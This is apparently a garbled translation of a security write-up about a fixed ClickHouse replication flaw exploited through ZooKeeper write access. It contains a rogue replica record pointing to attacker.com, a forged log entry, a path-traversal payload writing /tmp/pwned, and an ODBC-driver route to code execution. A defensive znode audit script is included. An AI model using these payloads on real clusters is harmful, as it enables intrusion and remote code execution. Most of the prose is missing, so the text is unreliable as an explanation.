Why keep the zoo cages closed



This article is a story about a very common vulnerability in the ClickHouse replication protocol, and it will also show how the attack surface can be expanded.



ClickHouse — , . ClickHouse Apache ZooKeeper (ZK) .



ZK , ZK , Kafka, Hadoop, ClickHouse .



ZooKeeper

0day Java , , ZooKeeper, ClickHouse.



ClickHouse DDL, ZK — /clickhouse/task_queue/ddl.



/clickhouse/task_queue/ddl/query-0001 :



version: 1
query: DROP TABLE xxx ON CLUSTER test;
hosts: ['host1:9000', 'host2:9000']


host1 host2 test . DDL CREATE/ALTER/DROP.



? ?



ClickHouse , ZK , . (ZK , chXX — , foobar — ):



CREATE TABLE foobar
(
    `action_id` UInt32 DEFAULT toUInt32(0),
    `status` String
)
ENGINE=ReplicatedMergeTree(
'/clickhouse/tables/01-01/foobar/', 'chXX')
ORDER BY action_id;


columns metadata.



/clickhouse/tables/01/foobar/replicas/chXX/hosts:



host: chXX-address
port: 9009
tcp_port: 9000
database: default
table: foobar
scheme: http


? , (TCP/9009) chXX-address firewall . ?



ZK, /clickhouse/tables/01-01/foobar/replicas/chXX host.



/clickhouse/tables/01-01/foobar/replicas/attacker/host:



host: attacker.com
port: 9009
tcp_port: 9000
database: default
table: foobar
scheme: http


, , — ZK /clickhouse/tables/01-01/foobar/log/log-00000000XX (XX , , ):



format version: 4
create_time: 2019-07-31 09:37:42
source replica: attacker
block_id: all_7192349136365807998_13893666115934954449
get
all_0_0_2


source_replica — , , block_id — , get — "get block" ( ).
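
The replica host record and the replication log entry shown above can be audited from the defender's side. The following is an added example, not code from the original article or from ClickHouse: it parses znode contents in the formats printed above and flags replica hosts outside an operator inventory, plus log entries whose source replica is not a trusted one. The `ZNODES` sample, `ALLOWED_HOSTS` and the function names are assumptions constructed for illustration.

```python
import re

# Constructed sample: znode path -> content, in the formats shown in the article.
ZNODES = {
    "/clickhouse/tables/01-01/foobar/replicas/chXX/host":
        "host: chXX-address\nport: 9009\ntcp_port: 9000\n"
        "database: default\ntable: foobar\nscheme: http\n",
    "/clickhouse/tables/01-01/foobar/replicas/attacker/host":
        "host: attacker.com\nport: 9009\ntcp_port: 9000\n"
        "database: default\ntable: foobar\nscheme: http\n",
    "/clickhouse/tables/01-01/foobar/log/log-0000000001":
        "format version: 4\ncreate_time: 2019-07-31 09:37:42\n"
        "source replica: attacker\n"
        "block_id: all_7192349136365807998_13893666115934954449\n"
        "get\nall_0_0_2\n",
}
ALLOWED_HOSTS = {"chXX-address"}  # assumption: the operator's replica inventory

HOST_RE = re.compile(r"^(?P<table>/.+)/replicas/(?P<replica>[^/]+)/host$")
LOG_RE = re.compile(r"^(?P<table>/.+)/log/log-\d+$")

def parse_fields(text):
    """Parse 'key: value' lines; bare lines such as 'get' are skipped."""
    fields = {}
    for line in text.splitlines():
        key, sep, value = line.partition(": ")
        if sep:
            fields[key] = value.strip()
    return fields

def audit(znodes, allowed_hosts):
    """Return sorted findings: rogue replica hosts and log entries naming them."""
    trusted, findings = set(), []
    for path, text in znodes.items():
        if m := HOST_RE.match(path):
            host = parse_fields(text).get("host")
            if host in allowed_hosts:
                trusted.add((m["table"], m["replica"]))
            else:
                findings.append(("rogue-replica", path, host))
    for path, text in znodes.items():
        if m := LOG_RE.match(path):
            src = parse_fields(text).get("source replica")
            if (m["table"], src) not in trusted:
                findings.append(("untrusted-log-source", path, src))
    return sorted(findings)
```

In a live deployment the `znodes` mapping would be filled by reading the replica and log znodes from ZooKeeper; here it is embedded so the check runs offline.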



, , ( , HTTP). attacker.com :



POST /?endpoint=DataPartsExchange:/clickhouse/tables/01-01/default/foobar/replicas/chXX&part=all_0_0_2&compress=false HTTP/1.1
Host: attacker.com
Authorization: XXX


XXX — . ClickHouse HTTP. , , ZooKeeper, , .



, , .







, , , , . , .



/var/lib/clickhouse ( - ):



flags — , ;

tmp — ;

user_files — (INTO OUTFILE );

metadata — sql ;

preprocessed_configs — /etc/clickhouse-server;

data — , ( /var/lib/clickhouse/data/default).



. — . foobar, , :



action_id.bin
action_id.mrk2
checksums.txt
columns.txt
count.txt
primary.idx
status.bin
status.mrk2


- .



file_name WriteBufferFromFile. , clickhouse. , , ( ):



\x01
\x00\x00\x00\x00\x00\x00\x00\x24
../../../../../../../../../tmp/pwned
\x12\x00\x00\x00\x00\x00\x00\x00
hellofromzookeeper


../../../../../../../../../tmp/pwned /tmp/pwned hellofromzookeeper.



(RCE).



RCE



ClickHouse clickhouse -. XML, , /var/lib/clickhouse/preprocessed_configs. . /etc/clickhouse-server , . ClickHouse -, — . ClickHouse, , root.



ODBC RCE



clickhouse, /nonexistent. , , /nonexistent clickhouse (! . ).



ClickHouse ODBC . ODBC (.so). ClickHouse , odbc-bridge, . , , ?



~/.odbc.ini :



[lalala]
Driver=/var/lib/clickhouse/user_files/test.so


SELECT * FROM odbc('DSN=lalala', 'test', 'test'); test.so RCE ( buglloc ).



ClickHouse 19.14.3. ClickHouse ZooKeepers!



